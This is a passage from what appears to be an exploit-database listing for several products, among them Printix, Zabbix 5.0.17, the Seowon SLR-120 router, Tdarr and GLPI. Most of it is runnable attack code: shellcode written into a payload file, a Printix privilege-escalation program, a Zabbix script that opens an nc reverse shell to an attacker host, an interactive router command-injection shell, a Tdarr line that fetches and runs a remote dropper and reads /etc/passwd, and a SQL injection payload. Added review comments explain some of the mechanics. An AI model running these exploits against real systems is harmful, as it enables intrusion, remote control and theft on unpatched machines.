b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48" buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9" buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6" buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b" buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b" buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41" buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0" buf += 
b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff" buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a" buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31" buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a" buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28" buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79" buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00" buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00" padding ="C" * (len(buffer) - len(push_esp) - len(nops)) payload = buffer + push_esp + nops + buf + padding try: with open("0day_Hejap.txt","wb") as f: print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("[-]File cannot be created")
  14. # Exploit Title: Printix Client 1.3.1106.0 - Privilege Escalation
# Date: 3/2/2022
# Exploit Author: Logan Latvala
# Vendor Homepage: https://printix.net
# Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip
# Version: <= 1.3.1106.0
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11
# CVE : CVE-2022-25090
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25090
using System;
using System.Runtime.InteropServices;
using System.Drawing;
using System.Reflection;
using System.Threading;
using System.IO;
using System.Text;
using System.Resources;
using System.Diagnostics;
//Assembly COM for transparent creation of the application.
//End of Assembly COM For Transparent Creation usage.

/// <summary>
/// Proof of concept for CVE-2022-25090 (Printix Client, affected versions per the header above).
/// Flow: locate the cached Printix MSI under C:\windows\installer by its Shell "System.Author"
/// property, start a watcher thread, then launch that MSI. While the installer runs, the
/// watcher rewrites the SetupFileName= line of every msiwrapper.ini that appears under
/// C:\Users\&lt;user&gt;\AppData\Local\Temp so that it names the file given as args[0].
/// Defender notes: the weakness is that the installer trusts a wrapper .ini it places in a
/// user-writable temp directory; the vendor fix is not named on this page. Writes to
/// msiwrapper.ini in a user temp directory by a process other than the installer are the
/// observable artefact of this technique.
/// </summary>
public class Program
{
    //Initiator class for the program, the program starts on the main method.

    /// <summary>
    /// Entry point. args[0] is the path the wrapper .ini will be pointed at; the
    /// program exits with code 40 when no argument is supplied and with code 12
    /// when no MSI authored by "Printix" is found.
    /// </summary>
    public static void Main(string[] args)
    {
        //Console.SetWindowSize(120,30);
        //Console.SetBufferSize(120,30);
        Console.ForegroundColor = ConsoleColor.Blue;
        Console.WriteLine("┌─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
        Console.WriteLine("├ oo dP dP ");
        Console.ForegroundColor = ConsoleColor.Red;
        Console.WriteLine("├ 88 88 ");
        Console.ForegroundColor = ConsoleColor.Green;
        Console.WriteLine("├ dP 88d888b. .d8888b. d888888b d8888P .d8888b. 88d8b.d8b. 88d888b. ");
        Console.ForegroundColor = ConsoleColor.Blue;
        Console.WriteLine("├ 88 88' `88 88' `88 .d8P' 88 88ooood8 88'`88'`88 88' `88 ");
        Console.ForegroundColor = ConsoleColor.Yellow;
        Console.WriteLine("├ 88 88 88 88. .88 .Y8P 88 88. ... 88 88 88 88. .88 ");
        Console.ForegroundColor = ConsoleColor.Magenta;
        Console.WriteLine("├ dP dP dP `88888P8 d888888P dP `88888P' dP dP dP 88Y888P' ");
        Console.WriteLine("├ 88 ");
        Console.WriteLine("├ dP ");
        Console.ForegroundColor = ConsoleColor.Blue;
        Console.Write("├ For ");
        Console.ForegroundColor = ConsoleColor.Magenta;
        Console.Write("Printix ");
        Console.ForegroundColor = ConsoleColor.Blue;
        Console.Write("Services Designed By Logan Latvala\n");
        Console.WriteLine("└─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
        Thread.Sleep(3000);
        string filesH = "";
        Console.WriteLine("Drag and drop a payload onto this application for execution.");
        // args[0] throws IndexOutOfRangeException when no argument was given; the catch
        // below turns that (and any other failure) into exit code 40.
        try
        {
            if (args[0]?.Length >0)
            {
                Console.WriteLine("File Added: " + args[0]);
            }
        }
        catch (Exception e)
        {
            Console.WriteLine("You\'re missing a file here, please ensure that you drag and drop a payload to execute.\n \n We'll print the error for you right here...\n \n");
            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine(e);
            Console.ReadLine();
            Environment.Exit(40);
        }
        Console.WriteLine("\n We're going to look for your printix installer, one moment...");
        // Every cached MSI on the machine is inspected; readFileProperties spawns a
        // PowerShell process per file, so this loop can be slow on hosts with many installers.
        string[] installerSearch = Directory.GetFiles(@"C:\windows\installer\", "*.msi", SearchOption.AllDirectories);
        double mCheck = 1.00;
        string trueInstaller = "";
        //Starts to enumerate window's installer directory for an author with the name of printix.
        foreach (string path in installerSearch)
        {
            Console.WriteLine("Searching Files: {0} / {1} Files", mCheck, installerSearch.Length);
            Console.WriteLine("Searching Files... " + (Math.Round((mCheck / installerSearch.Length) * 100)) + "% Done.");
            if (readFileProperties(path, "Printix"))
            {
                trueInstaller = path;
                Console.WriteLine("We've found your installer, we'll finish enumeration.");
                // First match wins; jump straight past the loop.
                goto MGMA;
            }
            mCheck++;
        }
        //Flag for enumeration when the loop needs to exit, since it shouldn't loop infinitely.
        MGMA:
        if (trueInstaller == "")
        {
            Console.WriteLine("We can't find your installer, you are not vulnerable.");
            Thread.Sleep(2000);
            Environment.Exit(12);
        }
        Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
        Console.WriteLine("├ We are starting to enumerate your temporary directory.");
        Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
        //Start a new thread here for enumeration.
        // The watcher must already be polling when the installer unpacks its wrapper .ini,
        // hence the thread is started before Process.Start.
        Thread t = new Thread(() => newTempThread(filesH, args));
        t.Start();
        Process.Start(trueInstaller);
        Console.WriteLine("All done.");
        Console.ReadLine();
    }

    /// <summary>
    /// Polls (20 ms sleep between passes) the current user's AppData\Local\Temp tree for
    /// msiwrapper.ini files. For each file not yet recorded in <paramref name="filesH"/> it
    /// reads all lines, replaces the line containing "SetupFileName" with
    /// SetupFileName="&lt;args[0]&gt;", and writes the file back.
    /// NOTE(review): Directory.GetFiles returns an empty array when nothing matches, so
    /// files[0] throws IndexOutOfRangeException on any pass where no wrapper .ini exists
    /// (likely the very first pass); the catch prints the error and then blocks on
    /// Console.ReadLine(), which stalls this thread until Enter is pressed. A files.Length
    /// check would avoid that. filesH is a value copy of Main's local; the caller's string
    /// is never updated.
    /// </summary>
    public static void newTempThread(string filesH, string[] args)
    {
        while (true)
        {
            try
            {
                //Starts the inheriting process for printix, in which scans for the files and relays their contents.
                string[] files = Directory.GetFiles(@"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp\", "msiwrapper.ini", SearchOption.AllDirectories);
                if (!string.IsNullOrEmpty(files[0]))
                {
                    foreach (string fl in files)
                    {
                        if (!filesH.Contains(fl))
                        {
                            //filesH += " " + fl;
                            string[] fileText = File.ReadAllLines(fl);
                            int linerc = 0;
                            foreach (string liners in fileText)
                            {
                                if (liners.Contains("SetupFileName"))
                                {
                                    //Most likely the temporary directory for setup, which presents it properly.
                                    Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
                                    Console.WriteLine("├ " + fl);
                                    fileText[linerc] = @"SetupFileName=" + "\"" + args[0] + "\"";
                                    Console.WriteLine("├ " + fileText[linerc] + "");
                                    Console.WriteLine("├─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────");
                                    Console.WriteLine("│");
                                    // Remember the file so it is rewritten only once.
                                    filesH += " " + fl;
                                    // Truncate first, then write the modified lines back.
                                    File.WriteAllText(fl, string.Empty);
                                    File.WriteAllLines(fl, fileText);
                                }
                                linerc++;
                            }
                        }
                    }
                }
            }
            catch (Exception e)
            {
                Console.WriteLine("There was an error, try re-running the program. \n" + e);
                Console.ReadLine();
            }
            Thread.Sleep(20);
        }
    }

    /// <summary>
    /// Returns true when the Windows Shell "System.Author" extended property of
    /// <paramref name="file"/> contains <paramref name="filter"/>. Implemented by spawning
    /// CMD.exe -> PowerShell and reading its stdout, so every call costs a process launch.
    /// NOTE(review): file is spliced unescaped into a single-quoted PowerShell string; a path
    /// containing a single quote would break the expression (unlikely for the GUID-style
    /// names under C:\windows\installer, but worth knowing if this helper is reused).
    /// </summary>
    public static bool readFileProperties(string file, string filter)
    {
        System.Diagnostics.Process process = new System.Diagnostics.Process();
        System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
        startInfo.UseShellExecute = false;
        startInfo.RedirectStandardOutput = true;
        startInfo.FileName = "CMD.exe";
        startInfo.Arguments = "/c PowerShell -Command \"$FilePath='" + file + "'; Write-Host ((New-Object -COMObject Shell.Application).NameSpace((Split-Path -Parent -Path $FilePath))).ParseName((Split-Path -Leaf -Path $FilePath)).ExtendedProperty('System.Author')\"";
        process.StartInfo = startInfo;
        process.Start();
        string output = process.StandardOutput.ReadToEnd();
        process.WaitForExit();
        if (output.Contains(filter))
        {
            return true;
        }
        else
        {
            return false;
        }
        //wmic datafile where Name="F:\\ekojs.txt" get Description,Path,Status,Version
    }
}
  15. # Exploit Title: Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path # Discovery by: Mohamed Alzhrani # Discovery Date: 2022-03-08 # Vendor Homepage: https://www.wondershare.com/ # Software Link : https://download.wondershare.com/drfone_full3360.exe # Tested Version: 12.0.18 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\Users\0xMaz>cmd /c wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Wondershare Install Assist Service Wondershare InstallAssist C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto # Service info: C:\Users\0xMaz>sc qc "Wondershare InstallAssist" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Wondershare InstallAssist TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\ProgramData\Wondershare\Service\InstallAssistService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Install Assist Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A local user who is able to insert their code in the system root path, undetected by the OS or other security applications, could potentially have it executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  16. # Exploit Title: McAfee® Safe Connect VPN - Unquoted Service Path Elevation Of Privilege # Date: 09/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.mcafee.com/ # Software Link: https://www.mcafee.com/en-us/vpn/mcafee-safe-connect.html # Version: 2.13 # Tested: Windows 10 x64 # Contact: https://twitter.com/dmaral3noz C:\Users\saudh>sc qc SafeConnectService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SafeConnectService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\McAfee\McAfee Safe Connect\SafeConnect.ServiceHost.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : McAfee Safe Connect Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  17. # Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path # Date: 09/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.battleye.com/ # Software Link: https://www.battleye.com/downloads/ # Version: 0.94 # Tested: Windows 10 Pro # Contact: https://twitter.com/dmaral3noz C:\Users\saudh>sc qc BEService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BEService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\BattlEye\BEService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BattlEye Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  18. # Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)
# Date: 9/3/2022
# Exploit Author: Hussien Misbah
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://www.zabbix.com/rn/rn5.0.17
# Version: 5.0.17
# Tested on: Linux
# Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit
#!/usr/bin/python3
# note : this is blind RCE so don't expect to see results on the site
# this exploit is tested against Zabbix 5.0.17 only
#
# Review notes (defender view):
# - Authenticated RCE: the script logs in with the supplied credentials, creates a Zabbix
#   agent item whose key is system.run[<command>,nowait] on the first host id found on the
#   dashboard, then re-posts the item form with check_now=Execute+now. The command is a
#   reverse shell to <attacker ip>:<attacker port>, so no output appears in the UI ("blind").
# - Preconditions visible here: a web account that may create items, and an agent that
#   accepts system.run keys (an agent that denies system.run, e.g. via DenyKey, will not
#   execute the item). Restricting item-creation rights and keeping system.run denied on
#   agents removes the path this script relies on.
import sys
import requests
import re
import random
import string
import colorama
from colorama import Fore

print(Fore.YELLOW+"[*] this exploit is tested against Zabbix 5.0.17 only")
print(Fore.YELLOW+"[*] can reach the author @ https://hussienmisbah.github.io/")


def item_name() -> str:
    """Return a random 20-letter ASCII name; used later to find the created item by text search."""
    letters = string.ascii_letters
    item = ''.join(random.choice(letters) for i in range(20))
    return item


if len(sys.argv) != 6 :
    print(Fore.RED +"[!] usage : ./expoit.py <target url> <username> <password> <attacker ip> <attacker port>")
    sys.exit(-1)
url = sys.argv[1]
username =sys.argv[2]
password = sys.argv[3]
host = sys.argv[4]
port = sys.argv[5]
s = requests.Session()
headers ={
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
}
data = {
    "request":"hosts.php",
    "name" : username ,
    "password" : password ,
    "autologin" :"1" ,
    "enter":"Sign+in"
}
# Defined for debugging through a local proxy; not passed to any request below.
proxies = {
    'http': 'http://127.0.0.1:8080'
}
r = s.post(url+"/index.php",data=data) #proxies=proxies)
# Login success and version are both detected by substring checks on the returned page.
if "Sign out" not in r.text :
    print(Fore.RED +"[!] Authentication failed")
    sys.exit(-1)
if "Zabbix 5.0.17" not in r.text :
    print(Fore.RED +"[!] This is not Zabbix 5.0.17")
    sys.exit(-1)
# hostId is scraped from the first filter_hostids[0]= link on the page; re.search returning
# None raises AttributeError, which the bare except turns into the failure message.
if "filter_hostids%5B0%5D=" in r.text :
    try :
        x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text)
        hostId = x.group(1)
    except :
        print(Fore.RED +"[!] Exploit failed to resolve HostID")
        print(Fore.BLUE +"[?] you can find it under /items then add item")
        sys.exit(-1)
else :
    print(Fore.RED +"[!] Exploit failed to resolve HostID")
    print(Fore.BLUE +"[?] you can find HostID under /items then add item")
    sys.exit(-1)
# NOTE(review): .group(1) on a None match raises AttributeError uncaught here; the pattern is
# also greedy (.*), so it takes everything up to the last "/> on the line.
sid= re.search('<meta name="csrf-token" content="(.*)"/>',r.text).group(1) # hidden_csrf_token
command=f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port} >/tmp/f"
payload = f"system.run[{command},nowait]"
Random_name = item_name()
# Full item-creation form as submitted by the 5.0.17 UI; only sid, hostid, name and key carry
# values that matter here, the rest are UI defaults.
data2 ={
    "sid":sid,"form_refresh":"1","form":"create","hostid":hostId,"selectedInterfaceId":"0",
    "name":Random_name,"type":"0","key":payload,"url":"","query_fields[name][1]":"",
    "query_fields[value][1]":"","timeout":"3s","post_type":"0","posts":"",
    "headers[name][1]":"","headers[value][1]":"","status_codes":"200","follow_redirects":"1",
    "retrieve_mode":"0","http_proxy":"","http_username":"","http_password":"",
    "ssl_cert_file":"","ssl_key_file":"","ssl_key_password":"","interfaceid":"1",
    "params_es":"","params_ap":"","params_f":"","value_type":"3","units":"","delay":"1m",
    "delay_flex[0][type]":"0","delay_flex[0][delay]":"","delay_flex[0][schedule]":"",
    "delay_flex[0][period]":"","history_mode":"1","history":"90d","trends_mode":"1",
    "trends":"365d","valuemapid":"0","new_application":"","applications[]":"0",
    "inventory_link":"0","description":"","status":"0","add":"Add"
}
r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"} )
# Page count is estimated from how often "?page=" appears in the response; if the item list
# fits on one page this is 0 and the loop below never runs.
no_pages= r2.text.count("?page=")
#################################################[Searching in all pages for the uploaded item]#################################################
page = 1
flag=False
while page <= no_pages :
    r_page=s.get(url+f"/items.php?page={page}" ,headers=headers )
    if Random_name in r_page.text :
        print(Fore.GREEN+"[+] the payload has been Uploaded Successfully")
        x2 = re.search(rf"(\d+)[^\d]>{Random_name}",r_page.text)
        # NOTE(review): if the regex does not match, `pass` leaves itemId unbound and the
        # next print raises NameError.
        try :
            itemId=x2.group(1)
        except :
            pass
        print(Fore.GREEN+f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}")
        flag=True
        break
    else :
        page +=1
if flag==False :
    print(Fore.BLUE +"[?] do you know you can't upload same key twice ?")
    print(Fore.BLUE +"[?] maybe it is already uploaded so set the listener and wait 1m")
    print(Fore.BLUE +"[*] change the port and try again")
    sys.exit(-1)
#################################################[Executing the item]#################################################
# Reuse the creation form as an update form and add the "Execute now" action.
data2["form"] ="update"
data2["selectedInterfaceId"] = "1"
data2["check_now"]="Execute+now"
data2.pop("add",None)
# NOTE(review): the trailing comma makes this a one-element tuple, not a string; requests
# still encodes it as a single itemid= field, so it works by accident.
data2["itemid"]=itemId,
print(Fore.GREEN+f"[+] set the listener at {port} please...")
r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"}) # ,proxies=proxies )
print(Fore.BLUE+ "[?] note : it takes up to +1 min so be patient :)")
answer =input(Fore.BLUE+"[+] got a shell ? [y]es/[N]o: ")
if "y" in answer.lower() :
    print(Fore.GREEN+"Nice !")
else :
    print(Fore.RED+"[!] if you find out why please contact me ")
sys.exit(0)
  19. # Exploit Title: Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path # Date: 09/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.sony.com/ # Software Link: https://support.d-imaging.sony.co.jp/www/disoft/int/download/playmemories-home/win/en/index.html # Version: 6.0 # Tested: Windows 10 Pro # Contact: https://twitter.com/dmaral3noz C:\Users\saudh>sc qc PMBDeviceInfoProvider [SC] QueryServiceConfig SUCCESS SERVICE_NAME: PMBDeviceInfoProvider TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : PMBDeviceInfoProvider DEPENDENCIES : RPCSS SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  20. # Exploit Title: WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-03-09 # Vendor : ilwebmaster21 # Version : WOW21_Service 5.0.1.9 # Vendor Homepage : https://wow21.life/ # Tested on OS: Windows 10 Pro x64 #PoC : ============== C:\>sc qc WOW21_Service [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: WOW21_Service TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\WOW21\WOW21_Service.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : WOW21_Service DIPENDENZE : SERVICE_START_NAME : LocalSystem
  21. # Exploit Title: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-03-09 # Vendor : David Xanatos # Version : SbieSvc 5.50.2 # Vendor Homepage : https://sandboxie-plus.com/ # Tested on OS: Windows 10 Pro x64 #PoC : ============== C:\>sc qc SbieSvc [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: SbieSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\Sandboxie-Plus\SbieSvc.exe GRUPPO_ORDINE_CARICAMENTO : UIGroup TAG : 0 NOME_VISUALIZZATO : Sandboxie Service DIPENDENZE : SERVICE_START_NAME : LocalSystem
  22. # Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)
# Date: 2022-03-11
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://www.seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30
# Version: All version
# Tested on: Windows 10 Enterprise x64 , Linux
# CVE : CVE-2020-17456
# [ About - Seowon SLR-120 router ]:
# The SLR-120 series provide consistent access to LTE networks and turn it into your own
# hotspot while being mobile. The convenience of sharing wireless internet access
# invigorates your lifestyle, families, friends and workmates. Carry it around to boost
# your active communication anywhere.
# [ Description ]:
# Executes commands without authentication as the admin user.
# To use it on any version, enter only the router IP and port (if applicable) in the
# script; commands are executed as the root user.
# [ Vulnerable products ]:
# SLR-120S42G
# SLR-120D42G
# SLR-120T42G
#
# Review notes (defender view):
# - The injection point is the pingIpAddr field of the diagnostic ping form handled by
#   /cgi-bin/system_log.cgi: the value sent is ";" + <command>, i.e. the router passes the
#   field to a shell unvalidated. The title states no authentication is needed.
# - The page names no fixed firmware ("All version"), so the practical mitigation is to
#   keep the router's web interface unreachable from untrusted networks and to watch for
#   POSTs to system_log.cgi whose pingIpAddr is not an address.
import requests

print ('''
###########################################################
# Seowon SLR-120S42G router - RCE (Unauthenticated) #
# BY:Aryan Chehreghani #
# Team:TAPESH DIGITAL SECURITY TEAM IRAN #
# mail:[email protected] #
# -+-USE:python script.py #
# Example Target : http://192.168.1.1:443/ #
###########################################################
''')
url = input ("=> Enter Target : ")
# Interactive loop: one command per prompt, response body printed verbatim.
while(True):
    try:
        cmd = input ("~Enter Command $ ")
        # NOTE(review): `header` is built but never passed to requests.post, so the request
        # goes out with the requests defaults (and the hard-coded Content-Length is ignored).
        header = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q:0.5",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": "207",
            "Origin": "http://192.168.1.1",
            "Connection": "close",
            "Referer": "http://192.168.1.1/",
            "Upgrade-Insecure-Requests": "1"
        }
        # Ping diagnostic form; every field except pingIpAddr is a UI default.
        datas = {
            'Command':'Diagnostic',
            'traceMode':'ping',
            'reportIpOnly':'',
            'pingIpAddr':';'+cmd,
            'pingPktSize':'56',
            'pingTimeout':'30',
            'pingCount':'4',
            'maxTTLCnt':'30',
            'queriesCnt':'3',
            'reportIpOnlyCheckbox':'on',
            'logarea':'com.cgi',
            'btnApply':'Apply',
            'T':'1646950471018'
        }
        x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)
        print(x.text)
    # NOTE(review): the bare except ends the loop on any error (connection failure, EOF on
    # stdin, Ctrl-C) without reporting what happened.
    except:
        break
  23. # Exploit Title: Tdarr 2.00.15 - Command Injection # Date: 10/03/2022 # Exploit Author: Sam Smith # Vendor Homepage: https://tdarr.io # Software Link: https://f000.backblazeb2.com/file/tdarrs/versions/2.00.15/linux_arm64/Tdarr_Server.zip # Version: 2.00.15 (likely also older versions) # Tested on: 2.00.15 Exploit: The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell. eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`. Tdarr is not protected by any auth by default and no credentials are required to trigger RCE
  24. # Exploit Title: Baixar GLPI Project 9.4.6 - SQLi # Date: 10/12 # Exploit Author: Joas Antonio # Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/ # Software Link: https://glpi-project.org/pt-br/baixar/ # Version: GLPI - 9.4.6 # Tested on: Windows/Linux # CVE : CVE-2021-44617 #POC1: plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111 sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"
  25. # Exploit Title: VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path # Date: 11/03/2022 # Exploit Author: Faisal Alasmari # Vendor Homepage: https://www.vive.com/ # Software Link: https://developer.vive.com/resources/downloads/ # Version: 1.0.0.4 # Tested: Windows 10 x64 C:\Users\User>sc qc "VIVE Runtime Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VIVE Runtime Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\VIVE\Updater\App\ViveRuntimeService\ViveAgentService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : VIVE Runtime Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.